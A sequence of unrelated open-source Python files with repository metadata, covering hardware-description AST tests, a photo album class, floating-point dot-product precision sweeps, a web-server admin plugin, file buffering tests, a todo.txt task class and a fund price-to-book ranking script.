b(c)
).Else(
b(c)
)
).Else(
b(0)
)
self.assertTrue(stm.isSame(stm_ref), [stm, stm_ref])
self.assertNotIn(stm, a.endpoints)
self.assertIn(stm, c.endpoints)
def test_Switch_simple(self):
_, (a, b, c) = self.sigs_by_n(3)
stm = \
Switch(a)\
.Case(0,
b(1)
).Default(
b(0)
)
stm._replace_input(a, c)
stm_ref = \
Switch(c)\
.Case(0,
b(1)
).Default(
b(0)
)
self.assertTrue(stm.isSame(stm_ref), [stm, stm_ref])
self.assertNotIn(stm, a.endpoints)
self.assertIn(stm, c.endpoints)
if __name__ == '__main__':
import sys
suite = unittest.TestSuite()
suite.addTest(unittest.makeSuite(AstNodeIoReplacingTC))
# suite.addTest(AstNodeIoReplacingTC("test_If_elif_replace_input"))
runner = unittest.TextTestRunner(verbosity=3)
sys.exit(not runner.run(suite).wasSuccessful())
|
Nic30/hwtLib
|
hwtLib/tests/synthesizer/astNodeIoReplacing_test.py
|
Python
|
mit
| 2,912 | 0.008242 |
from PIL import Image
import os.path,os
#import pickle
#import sqlite3
import hashlib
import time
import random
import logging
import copy
import threading
import itertools
from math import ceil
from enum import Enum
from copy import deepcopy
import itertools
from lipyc.utility import recursion_protect
from lipyc.Version import Versionned
from lipyc.config import *
from lipyc.utility import check_ext, make_thumbnail
from tkinter import messagebox
class Album(Versionned): #subalbums not fully implemented
def __init__(self, id, scheduler, name=None, datetime=None):
super().__init__()
self.scheduler = scheduler
self.id = id
self.name = name
self.datetime = datetime if datetime else time.mktime(time.gmtime())
self.subalbums = set()
self.thumbnail = None
self.files = set() #order by id
self.inner_keys = [] #use for inner albums
def __deepcopy__(self, memo):
new = Album(self.id, self.scheduler, self.name, self.datetime)
new.subalbums = deepcopy(self.subalbums)
new.thumbnail = deepcopy(self.thumbnail)
new.files = deepcopy(self.files)
new.inner_keys = deepcopy(self.inner_keys)
return new
#for copy_to,add_to,move_to
def clone(self, new_id):
alb = self.__deepcopy__(None)
alb.inner_keys.clear()
alb.id = new_id
return alb
def pseudo_clone(self):
new = Album(self.id, self.scheduler, self.name, self.datetime)
if self.thumbnail:
self.scheduler.duplicate(self.thumbnail)
new.subalbums = self.subalbums
new.thumbnail = self.thumbnail
new.files = self.files
return new
def sql(self):
return (self.id, self.name, self.datetime,
'|'.join( [ str(alb.id) for alb in self.subalbums] ), self.thumbnail,
'|'.join( [ str(afile.id) for afile in self.files] ),
'|'.join(self.inner_keys) )
def rename(self, name):
self.name = name
def add_file(self, _file):
self.files.add(_file)
        if self.thumbnail is None and _file.thumbnail :
self.thumbnail = self.scheduler.duplicate_file( _file.thumbnail )
def remove_file(self, _file):
self.files.discard(_file)
@recursion_protect()
def remove_all(self):
for album in list(self.subalbums):
album.remove_all()
self.subalbums.clear()
for _file in list(self.files):
self.remove_file(_file)
self.files.clear()
def add_subalbum(self, album):
self.subalbums.add( album )
def remove_subalbum(self, album):
if album in self.subalbums:
if album.thumbnail :
self.scheduler.remove_file( album.thumbnail )
self.subalbums.discard( album )
@recursion_protect()
def export_to(self, path):
location = os.path.join(path, self.name)
if not os.path.isdir(location):
os.makedirs( location )
for _file in self.files:
_file.export_to(location)
for album in self.subalbums:
album.export_to( location )
@recursion_protect()
def lock_files(self):
for _file in self.files:
_file.io_lock.acquire()
for album in self.subalbums:
album.lock_files()
def set_thumbnail(self, location):
if self.thumbnail :
self.scheduler.remove_file(self.thumbnail)
        if not isinstance(location, str) or check_ext(location, img_exts): # open file object
self.thumbnail = make_thumbnail(self.scheduler, location )
else:
            self.thumbnail = self.scheduler.add_file(location_album_default) # size and md5 ought to be computed once and for all
def deep_files(self):
tmp = itertools.chain.from_iterable(map(Album.deep_files, self.subalbums))
return itertools.chain( self.files, tmp)
@recursion_protect(0)
def __len__(self): #number of file in dir and subdir
return len(self.files) + sum( [len(a) for a in self.subalbums ] )
@recursion_protect(0)
def all_albums(self):
return itertools.chain( [self], *list(map( lambda x:x.all_albums(), self.subalbums )) )
@recursion_protect(0)
def all_files(self):
return set(itertools.chain( *list(map(lambda x:x.files, self.all_albums()))))
@recursion_protect(0)
def duplicate(self):
if self.thumbnail:
self.scheduler.duplicate_file(self.thumbnail)
for f in self.files:
f.duplicate()
for alb in self.subalbums:
alb.duplicate()
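# Hypothetical usage sketch (a lipyc scheduler object is assumed, as required
# by the constructor above):
#   root = Album(1, scheduler, name="Holidays")
#   root.add_subalbum(Album(2, scheduler, name="Beach"))
#   print(len(root))  # number of files in the album and its subalbums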
|
severus21/LiPyc
|
src/Album.py
|
Python
|
apache-2.0
| 4,909 | 0.020371 |
import math
import random
import operator
import traceback
from .titanic import ndarray
from .fpbench import fpcparser
from .arithmetic import mpmf, ieee754, posit, fixed, evalctx, analysis
from .arithmetic.mpmf import Interpreter
from .sweep import search
from .sweep.utils import *
dotprod_naive_template = '''(FPCore dotprod ((A n) (B m))
:pre (== n m)
{overall_prec}
(for ([i n])
([accum 0 (! {sum_prec} (+ accum
(! {mul_prec} (* (ref A i) (ref B i)))))])
(cast accum)))
'''
dotprod_fused_template = '''(FPCore dotprod ((A n) (B m))
:pre (== n m)
{overall_prec}
(for ([i n])
([accum 0 (! {sum_prec} (fma (ref A i) (ref B i) accum))])
(cast accum)))
'''
dotprod_fused_unrounded_template = '''(FPCore dotprod ((A n) (B m))
:pre (== n m)
{overall_prec}
(for ([i n])
([accum 0 (! {sum_prec} (fma (ref A i) (ref B i) accum))])
accum))
'''
binsum_template = '''(FPCore addpairs ((A n))
:pre (> n 1)
(tensor ([i (# (/ (+ n 1) 2))])
(let* ([k1 (# (* i 2))]
[k2 (# (+ k1 1))])
(if (< k2 n)
(! {sum_prec} (+ (ref A k1) (ref A k2)))
(ref A k1)))
))
(FPCore binsum ((A n))
(while (> (size B 0) 1)
([B A (addpairs B)])
(if (== (size B 0) 0) 0 (ref B 0))))
'''
nksum_template = '''(FPCore nksum ((A n))
:name "Neumaier's improved Kahan Summation algorithm"
{sum_prec}
(for* ([i n])
([elt 0 (ref A i)]
[t 0 (+ accum elt)]
[c 0 (if (>= (fabs accum) (fabs elt))
(+ c (+ (- accum t) elt))
(+ c (+ (- elt t) accum)))]
[accum 0 t])
(+ accum c)))
'''
vec_prod_template = '''(FPCore vec-prod ((A n) (B m))
:pre (== n m)
(tensor ([i n])
(! {mul_prec} (* (ref A i) (ref B i)))))
'''
dotprod_bin_template = (
binsum_template + '\n' +
vec_prod_template + '\n' +
'''(FPCore dotprod ((A n) (B m))
:pre (== n m)
(let ([result (binsum (vec-prod A B))])
(! {overall_prec} (cast result))))
''')
dotprod_neumaier_template = (
nksum_template + '\n' +
vec_prod_template + '\n' +
'''(FPCore dotprod ((A n) (B m))
:pre (== n m)
(let ([result (nksum (vec-prod A B))])
(! {overall_prec} (cast result))))
''')
def mk_dotprod(template, overall_prec, mul_prec, sum_prec):
return template.format(overall_prec=overall_prec,
mul_prec=mul_prec,
sum_prec=sum_prec)
def largest_representable(ctx):
if isinstance(ctx, evalctx.IEEECtx):
return mpmf.MPMF(ctx.fbound, ctx)
elif isinstance(ctx, evalctx.PositCtx):
return mpmf.MPMF(m=1, exp=ctx.emax, ctx=ctx)
else:
raise ValueError(f'unsupported type: {type(ctx)!r}')
def smallest_representable(ctx):
if isinstance(ctx, evalctx.IEEECtx):
return mpmf.MPMF(m=1, exp=ctx.n + 1, ctx=ctx)
elif isinstance(ctx, evalctx.PositCtx):
return mpmf.MPMF(m=1, exp=ctx.emin, ctx=ctx)
else:
raise ValueError(f'unsupported type: {type(ctx)!r}')
def safe_mul_ctx(ctx):
if isinstance(ctx, evalctx.IEEECtx):
safe_es = ctx.es + 2
safe_p = (ctx.p + 1) * 2
return ieee754.ieee_ctx(safe_es, safe_es + safe_p)
elif isinstance(ctx, evalctx.PositCtx):
# very conservative; not a posit ctx
log_emax = ctx.emax.bit_length()
safe_es = log_emax + 2
safe_p = (ctx.p + 1) * 2
return ieee754.ieee_ctx(safe_es, safe_es + safe_p)
else:
raise ValueError(f'unsupported type: {type(ctx)!r}')
def safe_quire_ctx(ctx, log_carries = 30):
mul_ctx = safe_mul_ctx(ctx)
largest = largest_representable(ctx)
largest_squared = largest.mul(largest, ctx=mul_ctx)
smallest = smallest_representable(ctx)
smallest_squared = smallest.mul(smallest, ctx=mul_ctx)
# check
assert largest_squared.inexact is False and smallest_squared.inexact is False
left = largest_squared.e + 1 + log_carries
right = smallest_squared.e
quire_type = fixed.fixed_ctx(right, left - right)
# check
assert not fixed.Fixed._round_to_context(largest_squared, ctx=quire_type).isinf
assert not fixed.Fixed._round_to_context(smallest_squared, ctx=quire_type).is_zero()
return quire_type
def round_vec(v, ctx):
return ndarray.NDArray([mpmf.MPMF(x, ctx=ctx) for x in v])
def rand_vec(n, ctx=None, signed=True):
if signed:
v = [random.random() if random.randint(0,1) else -random.random() for _ in range(n)]
else:
v = [random.random() for _ in range(n)]
if ctx is None:
return v
else:
return round_vec(v, ctx)
def setup_dotprod(template, precs):
evaltor = Interpreter()
main = load_cores(evaltor, mk_dotprod(template, *precs))
return evaltor, main
def setup_full_quire(ctx, unrounded=False):
qctx = safe_quire_ctx(ctx)
precs = (ctx.propstr(), '', qctx.propstr())
if unrounded:
template = dotprod_fused_unrounded_template
else:
template = dotprod_fused_template
return setup_dotprod(template, precs)
# sweep
# constants: base dtype
# # trials (input data...)
# variables: quire high bits
# quire lo bits
# metrics: ulps
# BAD - globals
class VecSettings(object):
def __init__(self):
self.trials = None
self.n = None
self.As = None
self.Bs = None
self.refs = None
self.template = None
self.overall_ctx = None
self.mul_ctx = None
def cfg(self, trials, n, ctx, template, signed=True):
self.trials = trials
self.n = n
self.As = [rand_vec(n, ctx=ctx, signed=signed) for _ in range(trials)]
self.Bs = [rand_vec(n, ctx=ctx, signed=signed) for _ in range(trials)]
evaltor, main = setup_full_quire(ctx)
self.refs = [evaltor.interpret(main, [a, b]) for a, b in zip(self.As, self.Bs)]
self.template = template
self.overall_ctx = ctx
self.mul_ctx = safe_mul_ctx(ctx)
print(mk_dotprod(template, self.overall_ctx.propstr(), self.mul_ctx.propstr(), safe_quire_ctx(ctx).propstr()))
global_settings = VecSettings()
def describe_stage(quire_lo, quire_hi):
overall_prec = global_settings.overall_ctx.propstr()
mul_prec = global_settings.mul_ctx.propstr()
sum_prec = fixed.fixed_ctx(-quire_lo, quire_lo + quire_hi).propstr()
precs = (overall_prec, mul_prec, sum_prec)
print(mk_dotprod(global_settings.template, *precs))
def vec_stage(quire_lo, quire_hi):
try:
overall_prec = global_settings.overall_ctx.propstr()
mul_prec = global_settings.mul_ctx.propstr()
sum_prec = fixed.fixed_ctx(-quire_lo, quire_lo + quire_hi).propstr()
precs = (overall_prec, mul_prec, sum_prec)
evaltor, main = setup_dotprod(global_settings.template, precs)
worst_ulps = 0
sum_ulps = 0
infs = 0
for a, b, ref in zip(global_settings.As, global_settings.Bs, global_settings.refs):
result = evaltor.interpret(main, [a, b])
if result.is_finite_real():
ulps = abs(linear_ulps(result, ref))
sum_ulps += ulps
if ulps > worst_ulps:
worst_ulps = ulps
else:
worst_ulps = math.inf
sum_ulps = math.inf
infs += 1
avg_ulps = sum_ulps / global_settings.trials
return quire_lo + quire_hi, infs, worst_ulps, avg_ulps
except Exception:
traceback.print_exc()
return math.inf, math.inf, math.inf, math.inf
def init_prec():
return 16
def neighbor_prec(x):
nearby = 5
for neighbor in range(x-nearby, x+nearby+1):
if 1 <= neighbor <= 4096 and neighbor != x:
yield neighbor
vec_inits = (init_prec,) * 2
vec_neighbors = (neighbor_prec,) * 2
vec_metrics = (operator.lt,) * 4
filtered_metrics = (operator.lt, None, None, operator.lt)
def run_sweep(trials, n, ctx, template, signed=True):
global_settings.cfg(trials, n, ctx, template, signed=signed)
frontier = search.sweep_random_init(vec_stage, vec_inits, vec_neighbors, vec_metrics)
filtered_frontier = search.filter_frontier(frontier, filtered_metrics)
sorted_frontier = sorted(filtered_frontier, key=lambda x: x[1][0])
for data, measures in sorted_frontier:
print('\t'.join(str(m) for m in measures))
for data, measures in sorted_frontier:
describe_stage(*data)
print()
bf16 = ieee754.ieee_ctx(8, 16)
f16 = ieee754.ieee_ctx(5, 16)
p16 = posit.posit_ctx(0, 16)
p16_1 = posit.posit_ctx(1, 16)
# some results
from math import inf as inf
# run_sweep(100, 1000, bf16, dotprod_naive_template)
stuff = [
((16, 5), (21, 0, 12, 0.57)),
((17, 5), (22, 0, 4, 0.19)),
((18, 5), (23, 0, 1, 0.04)),
((20, 5), (25, 0, 0, 0.0)),
((11, 5), (16, 0, 1928, 60.58)),
((13, 5), (18, 0, 1660, 31.54)),
((14, 5), (19, 0, 190, 5.18)),
((15, 5), (20, 0, 72, 2.01)),
((4, 6), (10, 0, 125090, 5556.55)),
((5, 6), (11, 0, 64674, 3095.17)),
((7, 5), (12, 0, 16034, 803.76)),
((8, 5), (13, 0, 8034, 500.84)),
((10, 5), (15, 0, 1970, 93.25)),
((1, 1), (2, 100, inf, inf)),
((1, 8), (9, 23, inf, inf)),
((5, 3), (8, 94, inf, inf)),
]
# run_sweep(100, 1000, bf16, dotprod_bin_template)
# improvement stopped at generation 7:
stuff = [
((16, 5), (21, 0, 5, 0.17)),
((17, 5), (22, 0, 2, 0.07)),
((18, 5), (23, 0, 1, 0.03)),
((21, 5), (26, 0, 0, 0.0)),
((11, 5), (16, 0, 247, 8.6)),
((12, 5), (17, 0, 125, 3.98)),
((13, 5), (18, 0, 61, 1.86)),
((14, 5), (19, 0, 30, 0.86)),
((15, 5), (20, 0, 13, 0.42)),
((3, 6), (9, 0, 62815, 2184.57)),
((4, 6), (10, 0, 32479, 1237.56)),
((6, 5), (11, 0, 15744, 733.06)),
((7, 5), (12, 0, 3887, 162.52)),
((8, 5), (13, 0, 1983, 81.96)),
((10, 5), (15, 0, 503, 19.36)),
((1, 1), (2, 100, inf, inf)),
((1, 7), (8, 40, inf, inf)),
((4, 3), (7, 88, inf, inf)),
]
# run_sweep(100, 1000, p16, dotprod_naive_template)
# improvement stopped at generation 7:
stuff = [
((16, 5), (21, 0, 127, 17.63)),
((17, 5), (22, 0, 64, 8.68)),
((18, 5), (23, 0, 32, 4.31)),
((19, 5), (24, 0, 16, 2.15)),
((20, 5), (25, 0, 8, 1.02)),
((21, 5), (26, 0, 4, 0.47)),
((6, 6), (12, 0, 129717, 28580.59)),
((11, 5), (16, 0, 4084, 603.34)),
((12, 5), (17, 0, 2032, 298.69)),
((13, 5), (18, 0, 1029, 146.11)),
((14, 5), (19, 0, 510, 73.76)),
((15, 5), (20, 0, 258, 36.43)),
((22, 5), (27, 0, 2, 0.2)),
((23, 5), (28, 0, 1, 0.06)),
((26, 5), (31, 0, 0, 0.0)),
((4, 6), (10, 0, 517871, 73538.57)),
((5, 6), (11, 0, 259311, 47042.38)),
((8, 5), (13, 0, 33455, 6982.4)),
((9, 5), (14, 0, 16495, 2870.68)),
((10, 5), (15, 0, 8143, 1276.26)),
((1, 1), (2, 100, inf, inf)),
((1, 8), (9, 37, inf, inf)),
((4, 3), (7, 99, inf, inf)),
((4, 4), (8, 96, inf, inf)),
]
# run_sweep(100, 1000, p16, dotprod_bin_template)
# improvement stopped at generation 7:
stuff = [
((16, 6), (22, 0, 64, 10.26)),
((17, 6), (23, 0, 32, 5.14)),
((18, 6), (24, 0, 16, 2.57)),
((19, 6), (25, 0, 9, 1.25)),
((20, 6), (26, 0, 4, 0.63)),
((21, 6), (27, 0, 2, 0.31)),
((11, 6), (17, 0, 2085, 332.43)),
((12, 6), (18, 0, 1087, 166.34)),
((13, 6), (19, 0, 547, 82.46)),
((14, 6), (20, 0, 261, 41.09)),
((15, 6), (21, 0, 130, 20.56)),
((22, 6), (28, 0, 1, 0.13)),
((26, 6), (32, 0, 0, 0.0)),
((3, 6), (9, 0, 539674, 91906.36)),
((6, 5), (11, 0, 67363, 16120.78)),
((7, 5), (12, 0, 34520, 6755.21)),
((8, 5), (13, 0, 16794, 3023.6)),
((9, 5), (14, 0, 8340, 1413.98)),
((10, 5), (15, 0, 4180, 681.31)),
((1, 1), (2, 100, inf, inf)),
((1, 7), (8, 42, inf, inf)),
((3, 3), (6, 99, inf, inf)),
((4, 3), (7, 91, inf, inf)),
((5, 5), (10, 0, 136730, 28892.4)),
]
|
billzorn/fpunreal
|
titanfp/vec_sweep.py
|
Python
|
mit
| 11,896 | 0.00269 |
# -*- coding: utf-8 -*-
#
# Cheroke-admin
#
# Authors:
# Alvaro Lopez Ortega <alvaro@alobbs.com>
#
# Copyright (C) 2009-2010 Alvaro Lopez Ortega
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of version 2 of the GNU General Public
# License as published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA
# 02110-1301, USA.
#
import CTK
URL_APPLY = '/plugin/wildcard/apply'
NOTE_WILDCARD = N_("Accepted host name. Wildcard characters (* and ?) are allowed. Eg: *example.com")
WARNING_EMPTY = N_("At least one wildcard string must be defined.")
class Content (CTK.Container):
def __init__ (self, refreshable, key, url_apply, **kwargs):
CTK.Container.__init__ (self, **kwargs)
entries = CTK.cfg.keys (key)
# Warning message
if not entries:
notice = CTK.Notice('warning')
notice += CTK.RawHTML (_(WARNING_EMPTY))
self += notice
# List
else:
table = CTK.Table()
submit = CTK.Submitter(url_apply)
submit += table
self += CTK.Indenter(submit)
table.set_header(1)
table += [CTK.RawHTML(_('Domain pattern'))]
for i in entries:
e1 = CTK.TextCfg ("%s!%s"%(key,i))
rm = None
if len(entries) >= 2:
rm = CTK.ImageStock('del')
rm.bind('click', CTK.JS.Ajax (url_apply,
data = {"%s!%s"%(key,i): ''},
complete = refreshable.JS_to_refresh()))
table += [e1, rm]
# Add New
table = CTK.PropsTable()
next = CTK.cfg.get_next_entry_prefix (key)
table.Add (_('New host name'), CTK.TextCfg(next, False, {'class':'noauto'}), _(NOTE_WILDCARD))
submit = CTK.Submitter(url_apply)
dialog = CTK.Dialog2Buttons ({'title': _('Add new entry')}, _('Add'), submit.JS_to_submit())
submit += table
submit.bind ('submit_success', refreshable.JS_to_refresh())
submit.bind ('submit_success', dialog.JS_to_close())
dialog += submit
self += dialog
add_new = CTK.Button(_('Add New'))
add_new.bind ('click', dialog.JS_to_show())
self += add_new
class Plugin_wildcard (CTK.Plugin):
def __init__ (self, key, vsrv_num):
CTK.Plugin.__init__ (self, key)
pre = '%s!domain' %(key)
url_apply = '%s/%s' %(URL_APPLY, vsrv_num)
self += CTK.RawHTML ("<h2>%s</h2>" % (_('Accepted Domains')))
# Content
refresh = CTK.Refreshable ({'id': 'plugin_wildcard'})
refresh.register (lambda: Content(refresh, pre, url_apply).Render())
self += refresh
# Validation, and Public URLs
CTK.publish ('^%s/[\d]+$'%(URL_APPLY), CTK.cfg_apply_post, method="POST")
|
mdavid/cherokee-webserver-svnclone
|
admin/plugins/wildcard.py
|
Python
|
gpl-2.0
| 3,364 | 0.012485 |
import unittest
from test import support
import io # C implementation.
import _pyio as pyio # Python implementation.
# Simple test to ensure that optimizations in the IO library deliver the
# expected results. For best testing, run this under a debug-build Python too
# (to exercise asserts in the C code).
lengths = list(range(1, 257)) + [512, 1000, 1024, 2048, 4096, 8192, 10000,
16384, 32768, 65536, 1000000]
class BufferSizeTest(unittest.TestCase):
def try_one(self, s):
# Write s + "\n" + s to file, then open it and ensure that successive
# .readline()s deliver what we wrote.
# Ensure we can open TESTFN for writing.
support.unlink(support.TESTFN)
# Since C doesn't guarantee we can write/read arbitrary bytes in text
# files, use binary mode.
f = self.open(support.TESTFN, "wb")
try:
# write once with \n and once without
f.write(s)
f.write(b"\n")
f.write(s)
f.close()
            f = self.open(support.TESTFN, "rb")
line = f.readline()
self.assertEqual(line, s + b"\n")
line = f.readline()
self.assertEqual(line, s)
line = f.readline()
self.assertTrue(not line) # Must be at EOF
f.close()
finally:
support.unlink(support.TESTFN)
def drive_one(self, pattern):
for length in lengths:
# Repeat string 'pattern' as often as needed to reach total length
# 'length'. Then call try_one with that string, a string one larger
# than that, and a string one smaller than that. Try this with all
# small sizes and various powers of 2, so we exercise all likely
# stdio buffer sizes, and "off by one" errors on both sides.
q, r = divmod(length, len(pattern))
teststring = pattern * q + pattern[:r]
self.assertEqual(len(teststring), length)
self.try_one(teststring)
self.try_one(teststring + b"x")
self.try_one(teststring[:-1])
def test_primepat(self):
# A pattern with prime length, to avoid simple relationships with
# stdio buffer sizes.
self.drive_one(b"1234567890\00\01\02\03\04\05\06")
def test_nullpat(self):
self.drive_one(bytes(1000))
class CBufferSizeTest(BufferSizeTest):
open = io.open
class PyBufferSizeTest(BufferSizeTest):
open = staticmethod(pyio.open)
def test_main():
support.run_unittest(CBufferSizeTest, PyBufferSizeTest)
if __name__ == "__main__":
test_main()
|
837468220/python-for-android
|
python3-alpha/python3-src/Lib/test/test_bufio.py
|
Python
|
apache-2.0
| 2,654 | 0.002638 |
# Topydo - A todo.txt client written in Python.
# Copyright (C) 2014 - 2015 Bram Schoenmakers <bram@topydo.org>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
This module provides the Todo class.
"""
from datetime import date
from topydo.lib.Config import config
from topydo.lib.TodoBase import TodoBase
from topydo.lib.Utils import date_string_to_date
class Todo(TodoBase):
"""
This class adds common functionality with respect to dates to the Todo
    base class, mainly by interpreting the start and due dates of a task.
"""
def __init__(self, p_str):
TodoBase.__init__(self, p_str)
self.attributes = {}
def get_date(self, p_tag):
""" Given a date tag, return a date object. """
string = self.tag_value(p_tag)
result = None
try:
result = date_string_to_date(string) if string else None
except ValueError:
pass
return result
def start_date(self):
""" Returns a date object of the todo's start date. """
return self.get_date(config().tag_start())
def due_date(self):
""" Returns a date object of the todo's due date. """
return self.get_date(config().tag_due())
def is_active(self):
"""
Returns True when the start date is today or in the past and the
task has not yet been completed.
"""
start = self.start_date()
return not self.is_completed() and (not start or start <= date.today())
def is_overdue(self):
"""
Returns True when the due date is in the past and the task has not
yet been completed.
"""
return not self.is_completed() and self.days_till_due() < 0
def days_till_due(self):
"""
Returns the number of days till the due date. Returns a negative number
of days when the due date is in the past.
Returns 0 when the task has no due date.
"""
due = self.due_date()
if due:
diff = due - date.today()
return diff.days
return 0
def length(self):
"""
Returns the length (in days) of the task, by considering the start date
and the due date. When there is no start date, its creation date is
used. Returns 0 when one of these dates is missing.
"""
start = self.start_date() or self.creation_date()
due = self.due_date()
if start and due and start < due:
diff = due - start
return diff.days
else:
return 0
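# Illustrative todo.txt line for the date handling above (a sketch; the tag
# names assume topydo's default 't'/'due' configuration):
#   Todo('(A) Pay bills t:2015-11-25 due:2015-12-01')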
|
bram85/topydo
|
topydo/lib/Todo.py
|
Python
|
gpl-3.0
| 3,165 | 0 |
#!/usr/bin/env python
# -*- coding: utf8 -*-
from __future__ import print_function
__author__ = 'gpanda'
"""References:
[1] easy thread-safe queque, http://pymotw.com/2/Queue/
"""
import argparse
import collections
import fileinput
import logging
import os
import pprint
import re
import string
import sys
import threading
import time
import Queue
from libs import driver
from libs.common import LOG, is_sec_id, AbriskError
config = {}
class Fund(object):
"""Fund data structure
pbr = price / book value (nav), an important index to sort funds
"""
def __init__(self, secId, name=None, time=None, price=float(0),
volume=float(0), nav=float(1)):
"""Initialize Fund object
:param secId: security id
:param name: name
:param time: data timestamp
:param price: security price
:param volume: exchange volume (unit: 0.1 billion)
:param nav: security (fund) net asset value or book value
"""
self.secId = secId
self.name = name
self.time = time
self.price = price
self.volume = volume
self.nav = nav
self.pbr = self.price / self.nav
def __cmp__(self, other):
return cmp(self.pbr, other.pbr)
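# Illustrative ordering sketch: funds compare by price/book ratio (pbr), so
# the "cheaper" fund sorts first (nav defaults to 1):
#   Fund('150019', price=0.90) < Fund('150020', price=1.20)  # True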
def _initialize_input_parser():
parser = argparse.ArgumentParser(
description="Show me interesting funds."
)
parser.add_argument(
'--fin',
default="default.0",
nargs="*",
metavar="FILE",
help="Security list input file."
)
parser.add_argument(
'--workers',
default=5,
nargs="?",
metavar="COUNT",
help="Working thread count."
)
parser.add_argument(
'--head', '-H',
default=0,
nargs="?",
metavar="COUNT",
help="How many items in the top rank to show."
)
parser.add_argument(
'--tail', '-T',
default=0,
nargs="?",
metavar="COUNT",
help="How many items in the bottom rank to show."
)
parser.add_argument(
'--funds', '-f',
nargs="*",
metavar="FUND INDEX",
help="One or more specified funds."
)
parser.add_argument(
'-v', '--verbose',
action="store_true",
help="Show debug messages."
)
return parser
def _parse_input_0(opts):
global config
global LOG
# retrieve fund list files
files = opts['fin']
if not isinstance(files, list):
files = [files]
config['fin'] = files
workers = int(opts['workers'])
if workers > 0:
config['workers'] = workers
head = int(opts['head'])
if head > 0:
config['head'] = head
tail = int(opts['tail'])
if tail > 0:
config['tail'] = tail
funds = opts['funds']
if not isinstance(funds, list):
funds = [funds]
config['funds'] = funds
if opts['verbose']:
config['debug'] = True
LOG.setLevel(logging.DEBUG)
return config
def _parse_input_1(cfg):
"""
TODO: comments
"""
# pprint.pprint(config)
fund_pool = collections.OrderedDict()
files = cfg['fin']
for yaf in files:
if os.path.exists(yaf):
filename = os.path.basename(yaf)
# print("{filename}".format(filename=filename))
fund_pool[filename] = collections.OrderedDict()
for line in fileinput.input(yaf):
if line.startswith("#"):
continue
fields = line.split(',')
sid = string.strip(fields[0])
if is_sec_id(sid):
fund_pool[filename][sid] = [].extend(fields[1:])
funds = config['funds']
if funds[0]:
category = 'Quick_show'
fund_pool[category] = collections.OrderedDict()
for fund in funds:
if is_sec_id(fund):
fund_pool[category][fund] = []
return fund_pool
def work_flow(input_queues, output_queues, error_queues):
"""
TODO: comments
"""
local = threading.local()
local.thread_name = threading.current_thread().getName()
LOG.debug("*** Enters work_flow() >>>")
# print("*** Thread-{0}:{1} *** Enters work_flow >>>"
# .format(local.thread_name, time.time()))
def retrieve_data(sid):
"""
TODO: comments
"""
LOG.debug("Retrieving data for %s", sid)
# print("Thread-{0}: Retrieving data for {1}"
# .format(local.thread_name, sid))
fund_raw_data = driver.getpbr(sid)
if not fund_raw_data:
return None
fund = Fund(sid,
name=fund_raw_data[2],
time=fund_raw_data[0],
price=fund_raw_data[4],
volume=fund_raw_data[5],
nav=fund_raw_data[3],
)
# driver.show(fund_raw_data)
return fund
for c, iq in input_queues.items():
sid=None
try:
LOG.debug("Switching to category %s", c)
# print("Thread-{0}: Switching to category {1}"
# .format(local.thread_name, c))
while not iq.empty():
sid = iq.get(False)
fund = retrieve_data(sid)
if fund:
output_queues[c].put(fund)
LOG.debug("Leaving category %s", c)
# print("Thread-{0}: Leaving category {1}"
# .format(local.thread_name, c))
except Queue.Empty as e:
LOG.info("Unexpected Queue.Empty Exception occurs, %s", e)
except Exception as e:
ename = "T:[" + local.thread_name + "]C:[" + c + "]S:[" + sid + "]"
error_queues[c].put(AbriskError(ename, e))
LOG.debug("*** Exits from work_flow() <<<")
# print("*** Thread-{0} *** Exits from work_flow <<<"
# .format(local.thread_name))
def sync(fund_pool):
"""Central controller of fund data synchronization.
** Preparing working queue (FIFO) and workers for funds of interest.
** Preparing data queue (Heap) for storing and sorting collected data.
** Retrieving fund data, refining and sorting them.
"""
input_queues = {}
output_queues = {}
error_queues = {}
for category, pool in fund_pool.items():
input_queues[category] = Queue.Queue(len(pool))
for sid in sorted(pool.keys()):
input_queues[category].put(sid)
output_queues[category] = Queue.PriorityQueue(len(pool))
error_queues[category] = Queue.Queue(len(pool))
workers = {}
worker_number = config['workers']
for i in range(worker_number):
workers[i] = threading.Thread(
target=work_flow,
name=str(i),
args=[input_queues, output_queues, error_queues],
)
workers[i].start()
for worker in workers.values():
worker.join()
rc = 0
for c, eq in error_queues.items():
if not eq.empty():
rc = 1
break
if rc == 0:
LOG.debug("All jobs have been done without errors.")
else:
LOG.debug("All jobs have been done, but there are errors.")
return output_queues, error_queues, rc
def report_fund_list(out_put_queues):
for category, priority_queue in out_put_queues.items():
LOG.debug("Category-%s", category)
# print("Category-{0}".format(category))
driver.setup_output(0, LOG)
driver.print_header()
while not priority_queue.empty():
fund = priority_queue.get()
driver.print_row((fund.time, fund.secId, fund.name,
fund.nav, fund.price, fund.volume,
fund.pbr))
def show_fund_pool(fund_pool):
for category, pool in fund_pool.items():
LOG.debug("Category %s", category)
# print("Category {category}".format(category=category))
for sid, extras in pool.items():
LOG.debug("%s, %s", sid, extras)
# print("{0}, {1}".format(sid, extras))
def main():
"""
TODO: no comments
"""
parser = _initialize_input_parser()
opts = vars(parser.parse_args(sys.argv[1:]))
cfg = _parse_input_0(opts)
fund_pool = _parse_input_1(cfg)
# show_fund_pool(fund_pool)
begin = time.time()
funds, errors, rc = sync(fund_pool)
if rc != 0:
for c, eq in errors.items():
print(c, file=sys.stderr)
while not eq.empty():
print(eq.get().name, file=sys.stderr)
sys.exit(1)
end = time.time()
report_fund_list(funds)
LOG.debug("Time usage: %s seconds; Workers: %s",
end - begin, config['workers'])
# print("Time usage: {0} seconds; Workers: {1}"
# .format(end - begin, config['workers']))
if __name__ == '__main__':
main()
|
gpanda/abrisk
|
fundlist.py
|
Python
|
gpl-2.0
| 8,887 | 0.000788 |
#
